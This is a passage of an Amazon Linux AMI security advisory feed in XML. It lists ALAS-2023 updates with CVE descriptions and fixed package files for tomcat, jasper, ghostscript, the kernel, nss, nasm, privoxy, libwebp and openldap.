arch="noarch"><filename>Packages/golang-tests-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-race" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-shared-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang" version="1.18.6" release="1.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.18.6-1.43.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.18.6" release="1.43.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.18.6-1.43.amzn1.noarch.rpm</filename></package><package name="golang-shared" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-shared-1.18.6-1.43.amzn1.i686.rpm</filename></package><package name="golang" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.18.6-1.43.amzn1.i686.rpm</filename></package><package name="golang-bin" version="1.18.6" release="1.43.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.18.6-1.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1732</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1732: important priority package update for tomcat8</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package 
updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28708:
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
CVE-2021-43980:
The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43980" title="" id="CVE-2021-43980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28708" title="" id="CVE-2023-28708" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-javadoc" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.87-1.92.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-log4j" version="8.5.87" release="1.92.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.87-1.92.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1733</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1733: important priority package update for jasper</title><issued date="2023-04-13 19:01:00" /><updated date="2023-04-20 20:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3467:
A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.26 handled component references in CDEF box in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.
CVE-2021-3443:
A NULL pointer dereference flaw was found in the way Jasper versions before 2.0.27 handled component references in the JP2 image format decoder. A specially crafted JP2 image file could cause an application using the Jasper library to crash when opened.
CVE-2021-3272:
jp2_decode in jp2/jp2_dec.c in libjasper in JasPer 2.0.24 has a heap-based buffer over-read when there is an invalid relationship between the number of channels and the number of image components.
CVE-2021-26927:
A flaw was found in jasper before 2.0.25. A null pointer dereference in jp2_decode in jp2_dec.c may lead to program crash and denial of service.
CVE-2021-26926:
A flaw was found in jasper before 2.0.25. An out of bounds read issue was found in jp2_decode function which may lead to disclosure of information or program crash.
CVE-2020-27828:
A flaw was found in the Jasper tool's jpc encoder. This flaw allows an attacker to craft input provided to Jasper, causing an arbitrary out-of-bounds write. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27828" title="" id="CVE-2020-27828" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26926" title="" id="CVE-2021-26926" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26927" title="" id="CVE-2021-26927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3272" title="" id="CVE-2021-3272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3443" title="" id="CVE-2021-3443" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3467" title="" id="CVE-2021-3467" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-utils" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="21.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-21.12.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="21.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/jasper-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-21.12.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.12.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-21.12.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1734</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1734: important priority package update for ghostscript</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-28879:
In Artifex Ghostscript through 10.01.0, there is a buffer overflow leading to potential corruption of data internal to the PostScript interpreter, in base/sbcp.c. This affects BCPEncode, BCPDecode, TBCPEncode, and TBCPDecode. If the write buffer is filled to one byte less than full, and one then tries to write an escaped character, two bytes are written.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28879" title="" id="CVE-2023-28879" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-devel" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="24.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-24.28.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-24.28.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="24.28.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-24.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1735</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1735: important priority package update for kernel</title><issued date="2023-04-27 16:19:00" /><updated date="2023-06-29 23:01:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-33203:
The Linux kernel before 6.2.9 has a race condition and resultant use-after-free in drivers/net/ethernet/qualcomm/emac/emac.c if a physically proximate attacker unplugs an emac based device.
CVE-2023-23454:
cbq_classify in net/sched/sch_cbq.c in the Linux kernel through 6.1.4 allows attackers to cause a denial of service (slab-out-of-bounds read) because of type confusion (non-negative numbers can sometimes indicate a TC_ACT_SHOT condition rather than valid classification results).
CVE-2023-2124:
An out-of-bounds memory access flaw was found in the Linux kernel's XFS file system in how a user restores an XFS image after failure (with a dirty log journal). This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2023-1838:
A use-after-free flaw was found in vhost_net_set_backend in drivers/vhost/net.c in virtio network subcomponent in the Linux kernel due to a double fget. This flaw could allow a local attacker to crash the system, and could even lead to a kernel information leak problem.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1838" title="" id="CVE-2023-1838" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2124" title="" id="CVE-2023-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23454" title="" id="CVE-2023-23454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33203" title="" id="CVE-2023-33203" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.313" release="162.533.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.313-162.533.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.313" 
release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.313-162.533.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.313" release="162.533.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.313-162.533.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1736</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1736: important priority package update for nss</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-0767:
firefox-esr, thunderbird and nss only are affected by this package.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0767" title="" id="CVE-2023-0767" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.53.1-7.88.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.53.1" release="7.88.amzn1" epoch="0" 
arch="i686"><filename>Packages/nss-devel-3.53.1-7.88.amzn1.i686.rpm</filename></package><package name="nss" version="3.53.1" release="7.88.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.53.1-7.88.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1737</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1737: important priority package update for nasm</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-44370:
NASM v2.16 was discovered to contain a heap buffer overflow in the component quote_for_pmake() in asm/nasm.c:856.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44370" title="" id="CVE-2022-44370" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nasm-doc" version="2.10.07" release="7.8.amzn1" epoch="0" arch="noarch"><filename>Packages/nasm-doc-2.10.07-7.8.amzn1.noarch.rpm</filename></package><package name="nasm-rdoff" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-rdoff-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm-debuginfo" version="2.10.07" release="7.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/nasm-debuginfo-2.10.07-7.8.amzn1.x86_64.rpm</filename></package><package name="nasm-rdoff" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-rdoff-2.10.07-7.8.amzn1.i686.rpm</filename></package><package name="nasm" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-2.10.07-7.8.amzn1.i686.rpm</filename></package><package name="nasm-debuginfo" version="2.10.07" release="7.8.amzn1" epoch="0" arch="i686"><filename>Packages/nasm-debuginfo-2.10.07-7.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1738</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1738: important priority package update for tomcat7</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-11 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24998:
Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.
CVE-2022-4132:
Tomcat: Memory leak
CVE-2017-12616:
When using a VirtualDirContext with Apache Tomcat 7.0.0 to 7.0.80 it was possible to bypass security constraints and/or view the source code of JSPs for resources served by the VirtualDirContext using a specially crafted request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12616" title="" id="CVE-2017-12616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4132" title="" id="CVE-2022-4132" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24998" title="" id="CVE-2023-24998" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-admin-webapps" version="7.0.109" 
release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.109-1.42.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.109" release="1.42.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-webapps-7.0.109-1.42.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1739</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1739: important priority package update for privoxy</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44542:
A memory leak vulnerability was found in Privoxy when handling errors.
CVE-2021-44540:
A vulnerability was found in Privoxy which was fixed in get_url_spec_param() by freeing memory of compiled pattern spec before bailing.
CVE-2021-20275:
A flaw was found in privoxy before 3.0.32. An invalid read of size two may occur in chunked_body_is_complete() leading to denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20275" title="" id="CVE-2021-20275" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44540" title="" id="CVE-2021-44540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44542" title="" id="CVE-2021-44542" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="privoxy" version="3.0.23" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-3.0.23-2.17.amzn1.x86_64.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/privoxy-debuginfo-3.0.23-2.17.amzn1.x86_64.rpm</filename></package><package name="privoxy" version="3.0.23" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-3.0.23-2.17.amzn1.i686.rpm</filename></package><package name="privoxy-debuginfo" version="3.0.23" release="2.17.amzn1" epoch="0" arch="i686"><filename>Packages/privoxy-debuginfo-3.0.23-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1740</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1740: medium priority package update for libwebp</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-36331:
A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability.
CVE-2020-36330:
A flaw was found in libwebp in versions before 1.0.1. An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36330" title="" id="CVE-2020-36330" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36331" title="" id="CVE-2020-36331" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libwebp-devel" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-devel-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-java-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-tools-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwebp-debuginfo-0.3.0-10.8.amzn1.x86_64.rpm</filename></package><package name="libwebp-devel" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-devel-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-java" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-java-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-tools" version="0.3.0" release="10.8.amzn1" epoch="0" arch="i686"><filename>Packages/libwebp-tools-0.3.0-10.8.amzn1.i686.rpm</filename></package><package name="libwebp-debuginfo" version="0.3.0" release="10.8.amzn1" epoch="0" 
arch="i686"><filename>Packages/libwebp-debuginfo-0.3.0-10.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1741</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1741: important priority package update for openldap</title><issued date="2023-04-27 16:19:00" /><updated date="2023-05-03 18:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-27212:
In OpenLDAP through 2.4.57 and 2.5.x through 2.5.1alpha, an assertion ...
NOTE: https://bugs.openldap.org/show_bug.cgi?id=9454
NOTE: trunk: https://git.openldap.org/openldap/openldap/-/commit/3539fc33212b528c56b716584f2c2994af7c30b0
NOTE: REL_ENG 2.4.x: https://git.openldap.org/openldap/openldap/-/commit/9badb73425a67768c09bcaed1a9c26c684af6c30
CVE-2020-36230:
A flaw was discovered in OpenLDAP before 2.4.57 leading to an assertion failure in slapd in the X.509 DN parsing in decode.c ber_next_element, resulting in denial of service.
CVE-2020-36229:
